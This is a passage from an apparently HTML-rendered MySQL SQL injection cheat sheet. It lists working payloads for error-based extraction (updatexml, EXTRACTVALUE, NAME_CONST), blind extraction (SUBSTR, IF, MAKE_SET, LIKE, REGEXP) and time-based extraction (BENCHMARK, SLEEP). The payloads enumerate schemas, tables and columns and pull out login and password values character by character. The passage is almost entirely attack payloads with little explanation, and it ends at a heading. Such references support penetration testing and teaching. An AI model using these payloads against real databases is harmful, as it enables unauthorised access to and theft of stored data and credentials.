<div class="highlight"><pre><span></span><code><a id="__codelineno-13-1" name="__codelineno-13-1" href="#__codelineno-13-1"></a><span class="n">updatexml</span><span class="p">(</span><span class="k">null</span><span class="p">,</span><span class="n">concat</span><span class="p">(</span><span class="mi">0</span><span class="n">x0a</span><span class="p">,</span><span class="k">version</span><span class="p">()),</span><span class="k">null</span><span class="p">)</span><span class="c1">-- -</span>
<a id="__codelineno-13-2" name="__codelineno-13-2" href="#__codelineno-13-2"></a><span class="n">updatexml</span><span class="p">(</span><span class="k">null</span><span class="p">,</span><span class="n">concat</span><span class="p">(</span><span class="mi">0</span><span class="n">x0a</span><span class="p">,(</span><span class="k">select</span><span class="w"> </span><span class="k">table_name</span><span class="w"> </span><span class="k">from</span><span class="w"> </span><span class="n">information_schema</span><span class="p">.</span><span class="n">tables</span><span class="w"> </span><span class="k">where</span><span class="w"> </span><span class="n">table_schema</span><span class="o">=</span><span class="k">database</span><span class="p">()</span><span class="w"> </span><span class="k">LIMIT</span><span class="w"> </span><span class="mi">0</span><span class="p">,</span><span class="mi">1</span><span class="p">)),</span><span class="k">null</span><span class="p">)</span><span class="c1">-- -</span>
</code></pre></div>
<h3 id="mysql-error-based-extractvalue-function">MYSQL Error Based - Extractvalue Function</h3>
<p>Works with <code>MySQL &gt;= 5.1</code></p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-14-1" name="__codelineno-14-1" href="#__codelineno-14-1"></a><span class="o">?</span><span class="n">id</span><span class="o">=</span><span class="mi">1</span><span class="w"> </span><span class="k">AND</span><span class="w"> </span><span class="n">EXTRACTVALUE</span><span class="p">(</span><span class="n">RAND</span><span class="p">(),</span><span class="n">CONCAT</span><span class="p">(</span><span class="nb">CHAR</span><span class="p">(</span><span class="mi">126</span><span class="p">),</span><span class="k">VERSION</span><span class="p">(),</span><span class="nb">CHAR</span><span class="p">(</span><span class="mi">126</span><span class="p">)))</span><span class="c1">--</span>
<a id="__codelineno-14-2" name="__codelineno-14-2" href="#__codelineno-14-2"></a><span class="o">?</span><span class="n">id</span><span class="o">=</span><span class="mi">1</span><span class="w"> </span><span class="k">AND</span><span class="w"> </span><span class="n">EXTRACTVALUE</span><span class="p">(</span><span class="n">RAND</span><span class="p">(),</span><span class="n">CONCAT</span><span class="p">(</span><span class="mi">0</span><span class="n">X3A</span><span class="p">,(</span><span class="k">SELECT</span><span class="w"> </span><span class="n">CONCAT</span><span class="p">(</span><span class="nb">CHAR</span><span class="p">(</span><span class="mi">126</span><span class="p">),</span><span class="k">schema_name</span><span class="p">,</span><span class="nb">CHAR</span><span class="p">(</span><span class="mi">126</span><span class="p">))</span><span class="w"> </span><span class="k">FROM</span><span class="w"> </span><span class="n">information_schema</span><span class="p">.</span><span class="n">schemata</span><span class="w"> </span><span class="k">LIMIT</span><span class="w"> </span><span class="n">data_offset</span><span class="p">,</span><span class="mi">1</span><span class="p">)))</span><span class="c1">--</span>
<a id="__codelineno-14-3" name="__codelineno-14-3" href="#__codelineno-14-3"></a><span class="o">?</span><span class="n">id</span><span class="o">=</span><span class="mi">1</span><span class="w"> </span><span class="k">AND</span><span class="w"> </span><span class="n">EXTRACTVALUE</span><span class="p">(</span><span class="n">RAND</span><span class="p">(),</span><span class="n">CONCAT</span><span class="p">(</span><span class="mi">0</span><span class="n">X3A</span><span class="p">,(</span><span class="k">SELECT</span><span class="w"> </span><span class="n">CONCAT</span><span class="p">(</span><span class="nb">CHAR</span><span class="p">(</span><span class="mi">126</span><span class="p">),</span><span class="k">table_name</span><span class="p">,</span><span class="nb">CHAR</span><span class="p">(</span><span class="mi">126</span><span class="p">))</span><span class="w"> </span><span class="k">FROM</span><span class="w"> </span><span class="n">information_schema</span><span class="p">.</span><span class="n">TABLES</span><span class="w"> </span><span class="k">WHERE</span><span class="w"> </span><span class="n">table_schema</span><span class="o">=</span><span class="n">data_column</span><span class="w"> </span><span class="k">LIMIT</span><span class="w"> </span><span class="n">data_offset</span><span class="p">,</span><span class="mi">1</span><span class="p">)))</span><span class="c1">--</span>
<a id="__codelineno-14-4" name="__codelineno-14-4" href="#__codelineno-14-4"></a><span class="o">?</span><span class="n">id</span><span class="o">=</span><span class="mi">1</span><span class="w"> </span><span class="k">AND</span><span class="w"> </span><span class="n">EXTRACTVALUE</span><span class="p">(</span><span class="n">RAND</span><span class="p">(),</span><span class="n">CONCAT</span><span class="p">(</span><span class="mi">0</span><span class="n">X3A</span><span class="p">,(</span><span class="k">SELECT</span><span class="w"> </span><span class="n">CONCAT</span><span class="p">(</span><span class="nb">CHAR</span><span class="p">(</span><span class="mi">126</span><span class="p">),</span><span class="k">column_name</span><span class="p">,</span><span class="nb">CHAR</span><span class="p">(</span><span class="mi">126</span><span class="p">))</span><span class="w"> </span><span class="k">FROM</span><span class="w"> </span><span class="n">information_schema</span><span class="p">.</span><span class="n">columns</span><span class="w"> </span><span class="k">WHERE</span><span class="w"> </span><span class="k">TABLE_NAME</span><span class="o">=</span><span class="n">data_table</span><span class="w"> </span><span class="k">LIMIT</span><span class="w"> </span><span class="n">data_offset</span><span class="p">,</span><span class="mi">1</span><span class="p">)))</span><span class="c1">--</span>
<a id="__codelineno-14-5" name="__codelineno-14-5" href="#__codelineno-14-5"></a><span class="o">?</span><span class="n">id</span><span class="o">=</span><span class="mi">1</span><span class="w"> </span><span class="k">AND</span><span class="w"> </span><span class="n">EXTRACTVALUE</span><span class="p">(</span><span class="n">RAND</span><span class="p">(),</span><span class="n">CONCAT</span><span class="p">(</span><span class="mi">0</span><span class="n">X3A</span><span class="p">,(</span><span class="k">SELECT</span><span class="w"> </span><span class="n">CONCAT</span><span class="p">(</span><span class="nb">CHAR</span><span class="p">(</span><span class="mi">126</span><span class="p">),</span><span class="n">data_column</span><span class="p">,</span><span class="nb">CHAR</span><span class="p">(</span><span class="mi">126</span><span class="p">))</span><span class="w"> </span><span class="k">FROM</span><span class="w"> </span><span class="n">data_schema</span><span class="p">.</span><span class="n">data_table</span><span class="w"> </span><span class="k">LIMIT</span><span class="w"> </span><span class="n">data_offset</span><span class="p">,</span><span class="mi">1</span><span class="p">)))</span><span class="c1">--</span>
</code></pre></div>
<h3 id="mysql-error-based-name_const-function-only-for-constants">MYSQL Error Based - NAME_CONST function (only for constants)</h3>
<p>Works with <code>MySQL &gt;= 5.0</code></p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-15-1" name="__codelineno-15-1" href="#__codelineno-15-1"></a><span class="o">?</span><span class="n">id</span><span class="o">=</span><span class="mi">1</span><span class="w"> </span><span class="k">AND</span><span class="w"> </span><span class="p">(</span><span class="k">SELECT</span><span class="w"> </span><span class="o">*</span><span class="w"> </span><span class="k">FROM</span><span class="w"> </span><span class="p">(</span><span class="k">SELECT</span><span class="w"> </span><span class="n">NAME_CONST</span><span class="p">(</span><span class="k">version</span><span class="p">(),</span><span class="mi">1</span><span class="p">),</span><span class="n">NAME_CONST</span><span class="p">(</span><span class="k">version</span><span class="p">(),</span><span class="mi">1</span><span class="p">))</span><span class="w"> </span><span class="k">as</span><span class="w"> </span><span class="n">x</span><span class="p">)</span><span class="c1">--</span>
<a id="__codelineno-15-2" name="__codelineno-15-2" href="#__codelineno-15-2"></a><span class="o">?</span><span class="n">id</span><span class="o">=</span><span class="mi">1</span><span class="w"> </span><span class="k">AND</span><span class="w"> </span><span class="p">(</span><span class="k">SELECT</span><span class="w"> </span><span class="o">*</span><span class="w"> </span><span class="k">FROM</span><span class="w"> </span><span class="p">(</span><span class="k">SELECT</span><span class="w"> </span><span class="n">NAME_CONST</span><span class="p">(</span><span class="k">user</span><span class="p">(),</span><span class="mi">1</span><span class="p">),</span><span class="n">NAME_CONST</span><span class="p">(</span><span class="k">user</span><span class="p">(),</span><span class="mi">1</span><span class="p">))</span><span class="w"> </span><span class="k">as</span><span class="w"> </span><span class="n">x</span><span class="p">)</span><span class="c1">--</span>
<a id="__codelineno-15-3" name="__codelineno-15-3" href="#__codelineno-15-3"></a><span class="o">?</span><span class="n">id</span><span class="o">=</span><span class="mi">1</span><span class="w"> </span><span class="k">AND</span><span class="w"> </span><span class="p">(</span><span class="k">SELECT</span><span class="w"> </span><span class="o">*</span><span class="w"> </span><span class="k">FROM</span><span class="w"> </span><span class="p">(</span><span class="k">SELECT</span><span class="w"> </span><span class="n">NAME_CONST</span><span class="p">(</span><span class="k">database</span><span class="p">(),</span><span class="mi">1</span><span class="p">),</span><span class="n">NAME_CONST</span><span class="p">(</span><span class="k">database</span><span class="p">(),</span><span class="mi">1</span><span class="p">))</span><span class="w"> </span><span class="k">as</span><span class="w"> </span><span class="n">x</span><span class="p">)</span><span class="c1">--</span>
</code></pre></div>
<h2 id="mysql-blind">MYSQL Blind</h2>
<h3 id="mysql-blind-with-substring-equivalent">MYSQL Blind With Substring Equivalent</h3>
<table>
<thead>
<tr>
<th>Function</th>
<th>Example</th>
<th>Description</th>
</tr>
</thead>
<tbody>
<tr>
<td><code>SUBSTR</code></td>
<td><code>SUBSTR(version(),1,1)=5</code></td>
<td>Extracts a substring from a string (starting at any position)</td>
</tr>
<tr>
<td><code>SUBSTRING</code></td>
<td><code>SUBSTRING(version(),1,1)=5</code></td>
<td>Extracts a substring from a string (starting at any position)</td>
</tr>
<tr>
<td><code>RIGHT</code></td>
<td><code>RIGHT(left(version(),1),1)=5</code></td>
<td>Extracts a number of characters from a string (starting from right)</td>
</tr>
<tr>
<td><code>MID</code></td>
<td><code>MID(version(),1,1)=4</code></td>
<td>Extracts a substring from a string (starting at any position)</td>
</tr>
<tr>
<td><code>LEFT</code></td>
<td><code>LEFT(version(),1)=4</code></td>
<td>Extracts a number of characters from a string (starting from left)</td>
</tr>
</tbody>
</table>
<p>Examples of Blind SQL injection using <code>SUBSTRING</code> or another equivalent function:</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-16-1" name="__codelineno-16-1" href="#__codelineno-16-1"></a><span class="o">?</span><span class="n">id</span><span class="o">=</span><span class="mi">1</span><span class="w"> </span><span class="k">AND</span><span class="w"> </span><span class="k">SELECT</span><span class="w"> </span><span class="n">SUBSTR</span><span class="p">(</span><span class="k">table_name</span><span class="p">,</span><span class="mi">1</span><span class="p">,</span><span class="mi">1</span><span class="p">)</span><span class="w"> </span><span class="k">FROM</span><span class="w"> </span><span class="n">information_schema</span><span class="p">.</span><span class="n">tables</span><span class="w"> </span><span class="o">&gt;</span><span class="w"> </span><span class="s1">&#39;A&#39;</span>
<a id="__codelineno-16-2" name="__codelineno-16-2" href="#__codelineno-16-2"></a><span class="o">?</span><span class="n">id</span><span class="o">=</span><span class="mi">1</span><span class="w"> </span><span class="k">AND</span><span class="w"> </span><span class="k">SELECT</span><span class="w"> </span><span class="n">SUBSTR</span><span class="p">(</span><span class="k">column_name</span><span class="p">,</span><span class="mi">1</span><span class="p">,</span><span class="mi">1</span><span class="p">)</span><span class="w"> </span><span class="k">FROM</span><span class="w"> </span><span class="n">information_schema</span><span class="p">.</span><span class="n">columns</span><span class="w"> </span><span class="o">&gt;</span><span class="w"> </span><span class="s1">&#39;A&#39;</span>
<a id="__codelineno-16-3" name="__codelineno-16-3" href="#__codelineno-16-3"></a><span class="o">?</span><span class="n">id</span><span class="o">=</span><span class="mi">1</span><span class="w"> </span><span class="k">AND</span><span class="w"> </span><span class="n">ASCII</span><span class="p">(</span><span class="k">LOWER</span><span class="p">(</span><span class="n">SUBSTR</span><span class="p">(</span><span class="k">version</span><span class="p">(),</span><span class="mi">1</span><span class="p">,</span><span class="mi">1</span><span class="p">)))</span><span class="o">=</span><span class="mi">51</span>
</code></pre></div>
<h3 id="mysql-blind-using-a-conditional-statement">MYSQL Blind Using a Conditional Statement</h3>
<ul>
<li>
<p>TRUE: <code>if @@version starts with a 5</code>:</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-17-1" name="__codelineno-17-1" href="#__codelineno-17-1"></a><span class="mi">2100935</span><span class="s1">&#39; OR IF(MID(@@version,1,1)=&#39;</span><span class="mi">5</span><span class="s1">&#39;,sleep(1),1)=&#39;</span><span class="mi">2</span>
<a id="__codelineno-17-2" name="__codelineno-17-2" href="#__codelineno-17-2"></a><span class="n">Response</span><span class="p">:</span>
<a id="__codelineno-17-3" name="__codelineno-17-3" href="#__codelineno-17-3"></a><span class="n">HTTP</span><span class="o">/</span><span class="mi">1</span><span class="p">.</span><span class="mi">1</span><span class="w"> </span><span class="mi">500</span><span class="w"> </span><span class="n">Internal</span><span class="w"> </span><span class="n">Server</span><span class="w"> </span><span class="n">Error</span>
</code></pre></div>
</li>
<li>
<p>FALSE: <code>if @@version starts with a 4</code>:</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-18-1" name="__codelineno-18-1" href="#__codelineno-18-1"></a><span class="mi">2100935</span><span class="s1">&#39; OR IF(MID(@@version,1,1)=&#39;</span><span class="mi">4</span><span class="s1">&#39;,sleep(1),1)=&#39;</span><span class="mi">2</span>
<a id="__codelineno-18-2" name="__codelineno-18-2" href="#__codelineno-18-2"></a><span class="n">Response</span><span class="p">:</span>
<a id="__codelineno-18-3" name="__codelineno-18-3" href="#__codelineno-18-3"></a><span class="n">HTTP</span><span class="o">/</span><span class="mi">1</span><span class="p">.</span><span class="mi">1</span><span class="w"> </span><span class="mi">200</span><span class="w"> </span><span class="n">OK</span>
</code></pre></div>
</li>
</ul>
<h3 id="mysql-blind-with-make_set">MYSQL Blind With MAKE_SET</h3>
<div class="highlight"><pre><span></span><code><a id="__codelineno-19-1" name="__codelineno-19-1" href="#__codelineno-19-1"></a><span class="k">AND</span><span class="w"> </span><span class="n">MAKE_SET</span><span class="p">(</span><span class="n">VALUE_TO_EXTRACT</span><span class="o">&lt;</span><span class="p">(</span><span class="k">SELECT</span><span class="p">(</span><span class="k">length</span><span class="p">(</span><span class="k">version</span><span class="p">()))),</span><span class="mi">1</span><span class="p">)</span>
<a id="__codelineno-19-2" name="__codelineno-19-2" href="#__codelineno-19-2"></a><span class="k">AND</span><span class="w"> </span><span class="n">MAKE_SET</span><span class="p">(</span><span class="n">VALUE_TO_EXTRACT</span><span class="o">&lt;</span><span class="n">ascii</span><span class="p">(</span><span class="k">substring</span><span class="p">(</span><span class="k">version</span><span class="p">(),</span><span class="n">POS</span><span class="p">,</span><span class="mi">1</span><span class="p">)),</span><span class="mi">1</span><span class="p">)</span>
<a id="__codelineno-19-3" name="__codelineno-19-3" href="#__codelineno-19-3"></a><span class="k">AND</span><span class="w"> </span><span class="n">MAKE_SET</span><span class="p">(</span><span class="n">VALUE_TO_EXTRACT</span><span class="o">&lt;</span><span class="p">(</span><span class="k">SELECT</span><span class="p">(</span><span class="k">length</span><span class="p">(</span><span class="n">concat</span><span class="p">(</span><span class="n">login</span><span class="p">,</span><span class="n">password</span><span class="p">)))),</span><span class="mi">1</span><span class="p">)</span>
<a id="__codelineno-19-4" name="__codelineno-19-4" href="#__codelineno-19-4"></a><span class="k">AND</span><span class="w"> </span><span class="n">MAKE_SET</span><span class="p">(</span><span class="n">VALUE_TO_EXTRACT</span><span class="o">&lt;</span><span class="n">ascii</span><span class="p">(</span><span class="k">substring</span><span class="p">(</span><span class="n">concat</span><span class="p">(</span><span class="n">login</span><span class="p">,</span><span class="n">password</span><span class="p">),</span><span class="n">POS</span><span class="p">,</span><span class="mi">1</span><span class="p">)),</span><span class="mi">1</span><span class="p">)</span>
</code></pre></div>
<h3 id="mysql-blind-with-like">MYSQL Blind With LIKE</h3>
<p>In MySQL, the <code>LIKE</code> operator can be used to perform pattern matching in queries. The operator allows the use of wildcard characters to match unknown or partial string values. This is especially useful in a blind SQL injection context when an attacker does not know the length or specific content of the data stored in the database.</p>
<p>Wildcard Characters in LIKE:</p>
<ul>
<li><strong>Percentage Sign</strong> (<code>%</code>): This wildcard represents zero, one, or multiple characters. It can be used to match any sequence of characters.</li>
<li><strong>Underscore</strong> (<code>_</code>): This wildcard represents a single character. It's used for more precise matching when you know the structure of the data but not the specific character at a particular position.</li>
</ul>
<div class="highlight"><pre><span></span><code><a id="__codelineno-20-1" name="__codelineno-20-1" href="#__codelineno-20-1"></a><span class="k">SELECT</span><span class="w"> </span><span class="n">cust_code</span><span class="w"> </span><span class="k">FROM</span><span class="w"> </span><span class="n">customer</span><span class="w"> </span><span class="k">WHERE</span><span class="w"> </span><span class="n">cust_name</span><span class="w"> </span><span class="k">LIKE</span><span class="w"> </span><span class="s1">&#39;k__l&#39;</span><span class="p">;</span>
<a id="__codelineno-20-2" name="__codelineno-20-2" href="#__codelineno-20-2"></a><span class="k">SELECT</span><span class="w"> </span><span class="o">*</span><span class="w"> </span><span class="k">FROM</span><span class="w"> </span><span class="n">products</span><span class="w"> </span><span class="k">WHERE</span><span class="w"> </span><span class="n">product_name</span><span class="w"> </span><span class="k">LIKE</span><span class="w"> </span><span class="s1">&#39;%user_input%&#39;</span>
</code></pre></div>
<h3 id="mysql-blind-with-regexp">MySQL Blind with REGEXP</h3>
<p>Blind SQL injection can also be performed using the MySQL <code>REGEXP</code> operator, which is used for matching a string against a regular expression. This technique is particularly useful when attackers want to perform more complex pattern matching than what the <code>LIKE</code> operator can offer.</p>
<table>
<thead>
<tr>
<th>Payload</th>
<th>Description</th>
</tr>
</thead>
<tbody>
<tr>
<td><code>' OR (SELECT username FROM users WHERE username REGEXP '^.{8,}$') --</code></td>
<td>Checking length</td>
</tr>
<tr>
<td><code>' OR (SELECT username FROM users WHERE username REGEXP '[0-9]') --</code></td>
<td>Checking for the presence of digits</td>
</tr>
<tr>
<td><code>' OR (SELECT username FROM users WHERE username REGEXP '^a[a-z]') --</code></td>
<td>Checking for data starting by "a"</td>
</tr>
</tbody>
</table>
<h2 id="mysql-time-based">MYSQL Time Based</h2>
<p>The following SQL codes will delay the output from MySQL.</p>
<ul>
<li>
<p>MySQL 4/5 : <a href="https://dev.mysql.com/doc/refman/8.4/en/select-benchmarking.html"><code>BENCHMARK()</code></a>
<div class="highlight"><pre><span></span><code><a id="__codelineno-21-1" name="__codelineno-21-1" href="#__codelineno-21-1"></a><span class="o">+</span><span class="n">BENCHMARK</span><span class="p">(</span><span class="mi">40000000</span><span class="p">,</span><span class="n">SHA1</span><span class="p">(</span><span class="mi">1337</span><span class="p">))</span><span class="o">+</span>
<a id="__codelineno-21-2" name="__codelineno-21-2" href="#__codelineno-21-2"></a><span class="s1">&#39;+BENCHMARK(3200,SHA1(1))+&#39;</span>
<a id="__codelineno-21-3" name="__codelineno-21-3" href="#__codelineno-21-3"></a><span class="k">AND</span><span class="w"> </span><span class="p">[</span><span class="n">RANDNUM</span><span class="p">]</span><span class="o">=</span><span class="n">BENCHMARK</span><span class="p">([</span><span class="n">SLEEPTIME</span><span class="p">]</span><span class="mi">000000</span><span class="p">,</span><span class="n">MD5</span><span class="p">(</span><span class="s1">&#39;[RANDSTR]&#39;</span><span class="p">))</span>
</code></pre></div></p>
</li>
<li>
<p>MySQL 5: <a href="https://dev.mysql.com/doc/refman/8.4/en/miscellaneous-functions.html#function_sleep"><code>SLEEP()</code></a>
<div class="highlight"><pre><span></span><code><a id="__codelineno-22-1" name="__codelineno-22-1" href="#__codelineno-22-1"></a><span class="n">RLIKE</span><span class="w"> </span><span class="n">SLEEP</span><span class="p">([</span><span class="n">SLEEPTIME</span><span class="p">])</span>
<a id="__codelineno-22-2" name="__codelineno-22-2" href="#__codelineno-22-2"></a><span class="k">OR</span><span class="w"> </span><span class="n">ELT</span><span class="p">([</span><span class="n">RANDNUM</span><span class="p">]</span><span class="o">=</span><span class="p">[</span><span class="n">RANDNUM</span><span class="p">],</span><span class="n">SLEEP</span><span class="p">([</span><span class="n">SLEEPTIME</span><span class="p">]))</span>
<a id="__codelineno-22-3" name="__codelineno-22-3" href="#__codelineno-22-3"></a><span class="n">XOR</span><span class="p">(</span><span class="k">IF</span><span class="p">(</span><span class="n">NOW</span><span class="p">()</span><span class="o">=</span><span class="n">SYSDATE</span><span class="p">(),</span><span class="n">SLEEP</span><span class="p">(</span><span class="mi">5</span><span class="p">),</span><span class="mi">0</span><span class="p">))</span><span class="n">XOR</span>
<a id="__codelineno-22-4" name="__codelineno-22-4" href="#__codelineno-22-4"></a><span class="k">AND</span><span class="w"> </span><span class="n">SLEEP</span><span class="p">(</span><span class="mi">10</span><span class="p">)</span><span class="o">=</span><span class="mi">0</span>
<a id="__codelineno-22-5" name="__codelineno-22-5" href="#__codelineno-22-5"></a><span class="k">AND</span><span class="w"> </span><span class="p">(</span><span class="k">SELECT</span><span class="w"> </span><span class="mi">1337</span><span class="w"> </span><span class="k">FROM</span><span class="w"> </span><span class="p">(</span><span class="k">SELECT</span><span class="p">(</span><span class="n">SLEEP</span><span class="p">(</span><span class="mi">10</span><span class="o">-</span><span class="p">(</span><span class="k">IF</span><span class="p">((</span><span class="mi">1</span><span class="o">=</span><span class="mi">1</span><span class="p">),</span><span class="mi">0</span><span class="p">,</span><span class="mi">10</span><span class="p">)))))</span><span class="w"> </span><span class="n">RANDSTR</span><span class="p">)</span>
</code></pre></div></p>
</li>
</ul>
<h3 id="using-sleep-in-a-subselect">Using SLEEP in a Subselect</h3>
<p>Extracting the length of the data.</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-23-1" name="__codelineno-23-1" href="#__codelineno-23-1"></a><span class="mi">1</span><span class="w"> </span><span class="k">AND</span><span class="w"> </span><span class="p">(</span><span class="k">SELECT</span><span class="w"> </span><span class="n">SLEEP</span><span class="p">(</span><span class="mi">10</span><span class="p">)</span><span class="w"> </span><span class="k">FROM</span><span class="w"> </span><span class="n">DUAL</span><span class="w"> </span><span class="k">WHERE</span><span class="w"> </span><span class="k">DATABASE</span><span class="p">()</span><span class="w"> </span><span class="k">LIKE</span><span class="w"> </span><span class="s1">&#39;%&#39;</span><span class="p">)</span><span class="o">#</span>
<a id="__codelineno-23-2" name="__codelineno-23-2" href="#__codelineno-23-2"></a><span class="mi">1</span><span class="w"> </span><span class="k">AND</span><span class="w"> </span><span class="p">(</span><span class="k">SELECT</span><span class="w"> </span><span class="n">SLEEP</span><span class="p">(</span><span class="mi">10</span><span class="p">)</span><span class="w"> </span><span class="k">FROM</span><span class="w"> </span><span class="n">DUAL</span><span class="w"> </span><span class="k">WHERE</span><span class="w"> </span><span class="k">DATABASE</span><span class="p">()</span><span class="w"> </span><span class="k">LIKE</span><span class="w"> </span><span class="s1">&#39;___&#39;</span><span class="p">)</span><span class="o">#</span><span class="w"> </span>
<a id="__codelineno-23-3" name="__codelineno-23-3" href="#__codelineno-23-3"></a><span class="mi">1</span><span class="w"> </span><span class="k">AND</span><span class="w"> </span><span class="p">(</span><span class="k">SELECT</span><span class="w"> </span><span class="n">SLEEP</span><span class="p">(</span><span class="mi">10</span><span class="p">)</span><span class="w"> </span><span class="k">FROM</span><span class="w"> </span><span class="n">DUAL</span><span class="w"> </span><span class="k">WHERE</span><span class="w"> </span><span class="k">DATABASE</span><span class="p">()</span><span class="w"> </span><span class="k">LIKE</span><span class="w"> </span><span class="s1">&#39;____&#39;</span><span class="p">)</span><span class="o">#</span>
<a id="__codelineno-23-4" name="__codelineno-23-4" href="#__codelineno-23-4"></a><span class="mi">1</span><span class="w"> </span><span class="k">AND</span><span class="w"> </span><span class="p">(</span><span class="k">SELECT</span><span class="w"> </span><span class="n">SLEEP</span><span class="p">(</span><span class="mi">10</span><span class="p">)</span><span class="w"> </span><span class="k">FROM</span><span class="w"> </span><span class="n">DUAL</span><span class="w"> </span><span class="k">WHERE</span><span class="w"> </span><span class="k">DATABASE</span><span class="p">()</span><span class="w"> </span><span class="k">LIKE</span><span class="w"> </span><span class="s1">&#39;_____&#39;</span><span class="p">)</span><span class="o">#</span>
</code></pre></div>
<p>Extracting the first character.</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-24-1" name="__codelineno-24-1" href="#__codelineno-24-1"></a><span class="mi">1</span><span class="w"> </span><span class="k">AND</span><span class="w"> </span><span class="p">(</span><span class="k">SELECT</span><span class="w"> </span><span class="n">SLEEP</span><span class="p">(</span><span class="mi">10</span><span class="p">)</span><span class="w"> </span><span class="k">FROM</span><span class="w"> </span><span class="n">DUAL</span><span class="w"> </span><span class="k">WHERE</span><span class="w"> </span><span class="k">DATABASE</span><span class="p">()</span><span class="w"> </span><span class="k">LIKE</span><span class="w"> </span><span class="s1">&#39;A____&#39;</span><span class="p">)</span><span class="o">#</span>
<a id="__codelineno-24-2" name="__codelineno-24-2" href="#__codelineno-24-2"></a><span class="mi">1</span><span class="w"> </span><span class="k">AND</span><span class="w"> </span><span class="p">(</span><span class="k">SELECT</span><span class="w"> </span><span class="n">SLEEP</span><span class="p">(</span><span class="mi">10</span><span class="p">)</span><span class="w"> </span><span class="k">FROM</span><span class="w"> </span><span class="n">DUAL</span><span class="w"> </span><span class="k">WHERE</span><span class="w"> </span><span class="k">DATABASE</span><span class="p">()</span><span class="w"> </span><span class="k">LIKE</span><span class="w"> </span><span class="s1">&#39;S____&#39;</span><span class="p">)</span><span class="o">#</span>
</code></pre></div>
<p>Extracting the second character.</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-25-1" name="__codelineno-25-1" href="#__codelineno-25-1"></a><span class="mi">1</span><span class="w"> </span><span class="k">AND</span><span class="w"> </span><span class="p">(</span><span class="k">SELECT</span><span class="w"> </span><span class="n">SLEEP</span><span class="p">(</span><span class="mi">10</span><span class="p">)</span><span class="w"> </span><span class="k">FROM</span><span class="w"> </span><span class="n">DUAL</span><span class="w"> </span><span class="k">WHERE</span><span class="w"> </span><span class="k">DATABASE</span><span class="p">()</span><span class="w"> </span><span class="k">LIKE</span><span class="w"> </span><span class="s1">&#39;SA___&#39;</span><span class="p">)</span><span class="o">#</span>
<a id="__codelineno-25-2" name="__codelineno-25-2" href="#__codelineno-25-2"></a><span class="mi">1</span><span class="w"> </span><span class="k">AND</span><span class="w"> </span><span class="p">(</span><span class="k">SELECT</span><span class="w"> </span><span class="n">SLEEP</span><span class="p">(</span><span class="mi">10</span><span class="p">)</span><span class="w"> </span><span class="k">FROM</span><span class="w"> </span><span class="n">DUAL</span><span class="w"> </span><span class="k">WHERE</span><span class="w"> </span><span class="k">DATABASE</span><span class="p">()</span><span class="w"> </span><span class="k">LIKE</span><span class="w"> </span><span class="s1">&#39;SW___&#39;</span><span class="p">)</span><span class="o">#</span>
</code></pre></div>
<p>Extracting the third character.</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-26-1" name="__codelineno-26-1" href="#__codelineno-26-1"></a><span class="mi">1</span><span class="w"> </span><span class="k">AND</span><span class="w"> </span><span class="p">(</span><span class="k">SELECT</span><span class="w"> </span><span class="n">SLEEP</span><span class="p">(</span><span class="mi">10</span><span class="p">)</span><span class="w"> </span><span class="k">FROM</span><span class="w"> </span><span class="n">DUAL</span><span class="w"> </span><span class="k">WHERE</span><span class="w"> </span><span class="k">DATABASE</span><span class="p">()</span><span class="w"> </span><span class="k">LIKE</span><span class="w"> </span><span class="s1">&#39;SWA__&#39;</span><span class="p">)</span><span class="o">#</span>
<a id="__codelineno-26-2" name="__codelineno-26-2" href="#__codelineno-26-2"></a><span class="mi">1</span><span class="w"> </span><span class="k">AND</span><span class="w"> </span><span class="p">(</span><span class="k">SELECT</span><span class="w"> </span><span class="n">SLEEP</span><span class="p">(</span><span class="mi">10</span><span class="p">)</span><span class="w"> </span><span class="k">FROM</span><span class="w"> </span><span class="n">DUAL</span><span class="w"> </span><span class="k">WHERE</span><span class="w"> </span><span class="k">DATABASE</span><span class="p">()</span><span class="w"> </span><span class="k">LIKE</span><span class="w"> </span><span class="s1">&#39;SWB__&#39;</span><span class="p">)</span><span class="o">#</span>
<a id="__codelineno-26-3" name="__codelineno-26-3" href="#__codelineno-26-3"></a><span class="mi">1</span><span class="w"> </span><span class="k">AND</span><span class="w"> </span><span class="p">(</span><span class="k">SELECT</span><span class="w"> </span><span class="n">SLEEP</span><span class="p">(</span><span class="mi">10</span><span class="p">)</span><span class="w"> </span><span class="k">FROM</span><span class="w"> </span><span class="n">DUAL</span><span class="w"> </span><span class="k">WHERE</span><span class="w"> </span><span class="k">DATABASE</span><span class="p">()</span><span class="w"> </span><span class="k">LIKE</span><span class="w"> </span><span class="s1">&#39;SWI__&#39;</span><span class="p">)</span><span class="o">#</span>
</code></pre></div>
<p>Extracting column_name.</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-27-1" name="__codelineno-27-1" href="#__codelineno-27-1"></a><span class="mi">1</span><span class="w"> </span><span class="k">AND</span><span class="w"> </span><span class="p">(</span><span class="k">SELECT</span><span class="w"> </span><span class="n">SLEEP</span><span class="p">(</span><span class="mi">10</span><span class="p">)</span><span class="w"> </span><span class="k">FROM</span><span class="w"> </span><span class="n">DUAL</span><span class="w"> </span><span class="k">WHERE</span><span class="w"> </span><span class="p">(</span><span class="k">SELECT</span><span class="w"> </span><span class="k">table_name</span><span class="w"> </span><span class="k">FROM</span><span class="w"> </span><span class="n">information_schema</span><span class="p">.</span><span class="n">columns</span><span class="w"> </span><span class="k">WHERE</span><span class="w"> </span><span class="n">table_schema</span><span class="o">=</span><span class="k">DATABASE</span><span class="p">()</span><span class="w"> </span><span class="k">AND</span><span class="w"> </span><span class="k">column_name</span><span class="w"> </span><span class="k">LIKE</span><span class="w"> </span><span class="s1">&#39;%pass%&#39;</span><span class="w"> </span><span class="k">LIMIT</span><span class="w"> </span><span class="mi">0</span><span class="p">,</span><span class="mi">1</span><span class="p">)</span><span class="w"> </span><span class="k">LIKE</span><span class="w"> </span><span class="s1">&#39;%&#39;</span><span class="p">)</span><span class="o">#</span>
</code></pre></div>
<h3 id="using-conditional-statements">Using Conditional Statements</h3>
